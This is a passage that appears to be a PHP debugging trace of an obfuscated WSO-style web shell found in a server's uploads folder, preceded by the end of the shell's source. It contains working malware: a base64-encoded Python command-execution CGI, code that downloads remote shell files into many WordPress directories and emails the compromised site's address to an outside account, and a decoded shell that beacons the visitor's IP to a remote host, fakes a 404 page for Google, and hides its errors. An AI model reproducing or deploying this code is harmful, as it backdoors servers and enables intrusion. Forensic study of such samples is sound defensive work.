nNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';\r\n \$file = fopen(\"python.r00t\" ,\"w+\");\r\n \$write = fwrite (\$file ,base64_decode(\$pythonp));\r\n fclose(\$file);\r\n chmod(\"python.r00t\",0755);\r\n echo \"<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> \";\r\n printFooter();\r\n } if( empty(\$_POST['a']) ) if(isset(\$default_action) && function_exists('action' . \$default_action)) \$_POST['a'] = \$default_action;\r\n else \$_POST['a'] = 'SecInfo';\r\n if( !empty(\$_POST['a']) && function_exists('action' . \$_POST['a']) ) call_user_func('action' . \$_POST['a']);\r\n \r\n?>\r\n<?php if(\$_POST['query']){ \$veriyfy = stripslashes(stripslashes(\$_POST['query']));\r\n \$data = \"data.txt\";\r\n @touch (\"data.txt\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$veriyfy ) ;\r\n @fclose (\$ver);\r\n }else{ \$datas=@fopen(\"data.txt\",'r');\r\n \$i=0;\r\n while (\$i <= 5) { \$i++;\r\n \$blue=@fgets(\$datas,1024);\r\n echo \$blue;\r\n } } \$datasi=@fopen(\"js/js.php\",'r');\r\n if(\$datasi){ }else{ @mkdir(\"js\");\r\n \$dos = file_get_contents(\"http://phpshell.in/txt/lamer.txt\");\r\n \$data = \"js/js.php\";\r\n @touch (\"js/js.php\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$dos ) ;\r\n @fclose (\$ver);\r\n \$yol = \"http://\".\$_SERVER['HTTP_HOST'].\"\".\$_SERVER['REQUEST_URI'].\"\";\r\n \$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.\$yol.'<br/>Sender Yolu : js/js.php</h1>';\r\n \$header .= \"From: SheLL Boot <suppor@nic.org>\\n\";\r\n \$header .= \"Content-Type: text/html;\r\n charset=utf-8\\n\";\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get(\$url){\r\n\$im = curl_init(\$url);\r\ncurl_setopt(\$im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt(\$im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt(\$im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt(\$im, CURLOPT_HEADER, 0);\r\nreturn curl_exec(\$im);\r\ncurl_close(\$im);\r\n}\r\n\$check1 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-includes/js/js.php\" ;\r\n\$text1 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1 = fopen(\$check1, 'w');\r\nfwrite(\$open1, \$text1);\r\nfclose(\$open1);\r\nif(file_exists(\$check1)){\r\n}\r\n\$check12 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-includes/index.php\" ;\r\n\$text12 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12 = fopen(\$check12, 'w');\r\nfwrite(\$open12, \$text12);\r\nfclose(\$open12);\r\nif(file_exists(\$check12)){\r\n}\r\n\$check123 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/images/images.php\" ;\r\n\$text123 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123 = fopen(\$check123, 'w');\r\nfwrite(\$open123, \$text123);\r\nfclose(\$open123);\r\nif(file_exists(\$check123)){\r\n}\r\n\$check12345 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/css/css.php\" ;\r\n\$text12345 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345 = fopen(\$check12345, 'w');\r\nfwrite(\$open12345, \$text12345);\r\nfclose(\$open12345);\r\nif(file_exists(\$check12345)){\r\n}\r\n\$check123456 = \$_SERVER['DOCUMENT_ROOT'] . \"/adm.php\" ;\r\n\$text123456 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456 = fopen(\$check123456, 'w');\r\nfwrite(\$open123456, \$text123456);\r\nfclose(\$open123456);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check1234567 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/css.php\" ;\r\n\$text1234567 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567 = fopen(\$check1234567, 'w');\r\nfwrite(\$open1234567, \$text1234567);\r\nfclose(\$open1234567);\r\nif(file_exists(\$check1234567)){\r\n}\r\n\$check12345678 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/install.php\" ;\r\n\$text12345678 = http_get('http://byr00t.co/txt/tools.txt');\r\n\$open12345678 = fopen(\$check12345678, 'w');\r\nfwrite(\$open12345678, \$text12345678);\r\nfclose(\$open12345678);\r\nif(file_exists(\$check12345678)){\r\n}\r\n\$check123456789 = \$_SERVER['DOCUMENT_ROOT'] . \"/cgi-bin/css.php\" ;\r\n\$text123456789 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456789 = fopen(\$check123456789, 'w');\r\nfwrite(\$open123456789, \$text123456789);\r\nfclose(\$open123456789);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check12345678910 = \$_SERVER['DOCUMENT_ROOT'] . \"/js/css.php\" ;\r\n\$text12345678910 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910 = fopen(\$check12345678910, 'w');\r\nfwrite(\$open12345678910, \$text12345678910);\r\nfclose(\$open12345678910);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check1234567891011 = \$_SERVER['DOCUMENT_ROOT'] . \"/css/css.php\" ;\r\n\$text1234567891011 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011 = fopen(\$check1234567891011, 'w');\r\nfwrite(\$open123, \$text1234567891011);\r\nfclose(\$open1234567891011);\r\nif(file_exists(\$check1234567891011)){\r\n}\r\n\$check123456789101112 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-login.php\" ;\r\n\$text123456789101112 = http_get('http://phpshell.in/txt/seo.txt');\r\n\$open123456789101112= fopen(\$check123456789101112, 'w');\r\nfwrite(\$open123456789101112, \$text123456789101112);\r\nfclose(\$open123456789101112);\r\nif(file_exists(\$check123456789101112)){\r\n}\r\n\$check12345678910111213 = \$_SERVER['DOCUMENT_ROOT'] . \"/images/css.php\" ;\r\n\$textk12345678910111213 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$openk12345678910111213 = fopen(\$checkk12345678910111213, 'w');\r\nfwrite(\$openk12345678910111213, \$textk12345678910111213);\r\nfclose(\$openk12345678910111213);\r\nif(file_exists(\$checkk12345678910111213)){\r\n}\r\n\$check1234567891011121314 = \$_SERVER['DOCUMENT_ROOT'] . \"/img/css.php\" ;\r\n\$text1234567891011121314 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011121314 = fopen(\$checkk1234567891011121314, 'w');\r\nfwrite(\$open1234567891011121314, \$text1234567891011121314);\r\nfclose(\$open1234567891011121314);\r\nif(file_exists(\$check1234567891011121314)){\r\n}\r\n\$check123456789101112131415 = \$_SERVER['DOCUMENT_ROOT'] . \"/modules/css.php\" ;\r\n\$text123456789101112131415 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456789101112131415 = fopen(\$check123456789101112131415, 'w');\r\nfwrite(\$open123456789101112131415, \$text123456789101112131415);\r\nfclose(\$open123456789101112131415);\r\nif(file_exists(\$check123456789101112131415)){\r\n}\r\n\$check12345678910111213141516 = \$_SERVER['DOCUMENT_ROOT'] . \"/includes/css.php\" ;\r\n\$text12345678910111213141516 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910111213141516 = fopen(\$check12345678910111213141516, 'w');\r\nfwrite(\$open12345678910111213141516, \$text12345678910111213141516);\r\nfclose(\$open12345678910111213141516);\r\nif(file_exists(\$check12345678910111213141516)){\r\n}\r\n\$check1234567891011121314151617 = \$_SERVER['DOCUMENT_ROOT'] . \"/phpinfo.php\" ;\r\n\$text1234567891011121314151617 = http_get('http://phpshell.in/txt/phpinfo.txt');\r\n\$open1234567891011121314151617 = fopen(\$check1234567891011121314151617, 'w');\r\nfwrite(\$open1234567891011121314151617, \$text1234567891011121314151617);\r\nfclose(\$open1234567891011121314151617);\r\nif(file_exists(\$check1234567891011121314151617)){\r\n}\r\n\$check123456789101112131415161718 = \$_SERVER['DOCUMENT_ROOT'] . \"/.well-known/css.php\" ;\r\n\$textk123456789101112131415161718 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$openk123456789101112131415161718 = fopen(\$checkk123456789101112131415161718, 'w');\r\nfwrite(\$openk123456789101112131415161718, \$textk123456789101112131415161718);\r\nfclose(\$openk123456789101112131415161718);\r\nif(file_exists(\$checkk123456789101112131415161718)){\r\n}\r\n\$checkk12345678910111213141516171819 = \$_SERVER['DOCUMENT_ROOT'] . \"/sites/css.php\" ;\r\n\$text12345678910111213141516171819 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910111213141516171819 = fopen(\$check12345678910111213141516171819, 'w');\r\nfwrite(\$open12345678910111213141516171819, \$text12345678910111213141516171819);\r\nfclose(\$open12345678910111213141516171819);\r\nif(file_exists(\$check12345678910111213141516171819)){\r\n}\r\n\$check1234567891011121314151617181920 = \$_SERVER['DOCUMENT_ROOT'] . \"/tmp/css.php\" ;\r\n\$text1234567891011121314151617181920 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011121314151617181920 = fopen(\$check1234567891011121314151617181920, 'w');\r\nfwrite(\$open1234567891011121314151617181920, \$text1234567891011121314151617181920);\r\nfclose(\$open1234567891011121314151617181920);\r\nif(file_exists(\$check1234567891011121314151617181920)){\r\n}\r\n?>\r\n");
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:09:37.411291]
1 0 1 0.000141 393608
1 3 0 0.000369 427040 {main} 1 /var/www/html/uploads/wso1.php.suspected 0 0
1 A /var/www/html/uploads/wso1.php.suspected 2 $stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1 A /var/www/html/uploads/wso1.php.suspected 3 $stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2 4 0 0.000451 427040 base64_decode 0 /var/www/html/uploads/wso1.php.suspected 4 1 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2 4 1 0.000470 427200
2 4 R 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 0 0.000491 427168 gzinflate 0 /var/www/html/uploads/wso1.php.suspected 4 1 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 1 0.000513 427296
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 0 0.000531 427136 htmlspecialchars_decode 0 /var/www/html/uploads/wso1.php.suspected 4 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 1 0.000550 427168
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 7 0 0.000609 428712 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' /var/www/html/uploads/wso1.php.suspected 4 0
3 8 0 0.000629 428712 strrev 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code 1 1 '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3 8 1 0.000681 461512
3 8 R 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 0 0.000727 461480 base64_decode 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code 1 1 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 1 0.000843 494280
3 9 R '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 0 0.001290 461480 gzinflate 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code 1 1 '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 1 0.001752 486088
3 10 R 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 0 0.002199 453288 gzuncompress 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code 1 1 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 1 0.002948 539336
3 11 R '<?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3 12 0 0.006065 1144192 eval 1 '?><?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n if($gitt == false){\r\n @$gitt = file_get_contents($x);\r\n }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = 